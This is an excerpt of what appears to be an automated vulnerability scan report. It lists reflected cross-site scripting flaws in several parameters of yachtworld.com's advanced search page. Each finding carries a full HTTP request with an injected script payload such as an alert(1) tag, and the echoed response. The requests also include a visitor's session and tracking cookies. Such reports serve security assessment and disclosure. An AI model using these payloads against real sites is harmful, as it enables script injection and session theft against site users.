VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:34:54 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<input type="hidden" name="send_to" value="techf1854"><script>alert(1)</script>6b27e78a154">
...[SNIP]...

3.329. http://www.yachtworld.com/core/listing/advancedSearch.jsp [No parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/advancedSearch.jsp

Issue detail

The value of the No request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e275'%3balert(1)//80e3cac22f8 was submitted in the No parameter. This input was echoed as 6e275';alert(1)//80e3cac22f8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/advancedSearch.jsp?fromYear=2004&searchtype=homepage&Ntk=boatsEN&sm=3&toLength=32&cit=true&luom=126&currencyid=100&No=106e275'%3balert(1)//80e3cac22f8&fromPrice=0&fromLength=24&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 500 Internal Server Error
Date: Thu, 27 Jan 2011 20:34:33 GMT
Server: Apache
Cache-Control: private
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "106e275';alert(1)//80e3cac22f8"<br>
...[SNIP]...

3.330. http://www.yachtworld.com/core/listing/advancedSearch.jsp [fromLength parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/advancedSearch.jsp

Issue detail

The value of the fromLength request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 192da"><script>alert(1)</script>5d97ec0f13a was submitted in the fromLength parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/advancedSearch.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&luom=126&currencyid=100&cit=true&toLength=32&fromLength=24192da"><script>alert(1)</script>5d97ec0f13a&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2CUsed%2C2004; latestSavedSearches=0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.20.10.1296155952; s_pers=%20s_nr%3D1296156212531%7C1298748212531%3B%20s_lv%3D1296156212533%7C1390764212533%3B%20s_lv_s%3DFirst%2520Visit%7C1296158012533%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/advancedSearch.jsp%2525253FNtk%2525253DboatsEN%25252526searchtype%2525253Dhomepage%25252526fromYear%2525253D2%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:45 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 02 Dec 2010 00:46:40 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 56314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>Advance
...[SNIP]...
<INPUT size=10 type="text" name="fromLength" value="24192da"><script>alert(1)</script>5d97ec0f13a">
...[SNIP]...

3.331. http://www.yachtworld.com/core/listing/advancedSearch.jsp [fromPrice parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/advancedSearch.jsp

Issue detail

The value of the fromPrice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6f43"><script>alert(1)</script>6c449de46a7 was submitted in the fromPrice parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/advancedSearch.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&luom=126&currencyid=100&cit=true&toLength=32&fromLength=24&fromPrice=0b6f43"><script>alert(1)</script>6c449de46a7&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2CUsed%2C2004; latestSavedSearches=0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.20.10.1296155952; s_pers=%20s_nr%3D1296156212531%7C1298748212531%3B%20s_lv%3D1296156212533%7C1390764212533%3B%20s_lv_s%3DFirst%2520Visit%7C1296158012533%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/advancedSearch.jsp%2525253FNtk%2525253DboatsEN%25252526searchtype%2525253Dhomepage%25252526fromYear%2525253D2%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:47 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 02 Dec 2010 00:46:40 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 56314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>Advance
...[SNIP]...
<INPUT size=10 type="text" name="fromPrice" value="0b6f43"><script>alert(1)</script>6c449de46a7">
...[SNIP]...

3.332. http://www.yachtworld.com/core/listing/advancedSearch.jsp [fromYear parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/advancedSearch.jsp

Issue detail

The value of the fromYear request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1841d"><script>alert(1)</script>3fec9f35b61 was submitted in the fromYear parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /core/listing/advancedSearch.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=20041841d"><script>alert(1)</script>3fec9f35b61&sm=3&luom=126&currencyid=100&cit=true&toLength=32&fromLength=24&fromPrice=0&man=regulator&slim=quick&is=false&pricderange=Select+Price+Range HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.yachtworld.com/core/listing/cache/searchResults.jsp
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yw_c_id=5778232892790151794; __utmz=20819632.1296155835.1.1.utmcsr=starlingmarine.com|utmccn=(referral)|utmcmd=referral|utmcct=/used-new-boats-wilmington-morehead-nc.html; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; __utma=20819632.1753731474.1296155835.1296155835.1296155835.1; __utmc=20819632; __utmb=20819632.4.10.1296155835; yw_locale2=en_US; __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; savedLabel0=24-32%20ft,regulator,Used,2004; savedLabel1=24-32%20ft%2Cregulator%2CUsed%2C2004; latestSavedSearches=0_; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.20.10.1296155952; s_pers=%20s_nr%3D1296156212531%7C1298748212531%3B%20s_lv%3D1296156212533%7C1390764212533%3B%20s_lv_s%3DFirst%2520Visit%7C1296158012533%3B; s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dno%2520search%2520phrase%2520entered%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3Ddeyachtworld%253D%252526pid%25253DsearchResults_US%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.yachtworld.com/core/listing/advancedSearch.jsp%2525253FNtk%2525253DboatsEN%25252526searchtype%2525253Dhomepage%25252526fromYear%2525253D2%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:39:28 GMT
Server: Apache
Cache-Control: private
If-Modified-Since: Thu, 02 Dec 2010 00:46:40 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 56314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

<title>Advance
...[SNIP]...
<INPUT size=10 type="text" name="fromYear" value="20041841d"><script>alert(1)</script>3fec9f35b61">
...[SNIP]...

3.333. http://www.yachtworld.com/core/listing/advancedSearch.jsp [man parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/core/listing/advancedSearch.jsp

Issue detail

The value of the man request parameter is copied into a JavaScript rest-of-line comment. The payload 68cef%0aalert(1)//7c05aa0dfe9 was submitted in the man parameter. This input was echoed as 68cef
alert(1)//7c05aa0dfe9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /core/listing/advancedSearch.jsp?Ntk=boatsEN&searchtype=homepage&fromYear=2004&sm=3&luom=126&currencyid=100&cit=true&toLength=32&fromLength=24&fromPrice=0&man=regulator68cef%0aalert(1)//7c05aa0dfe9&slim=quick&is=false&pricderange=Select+Price+Range HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
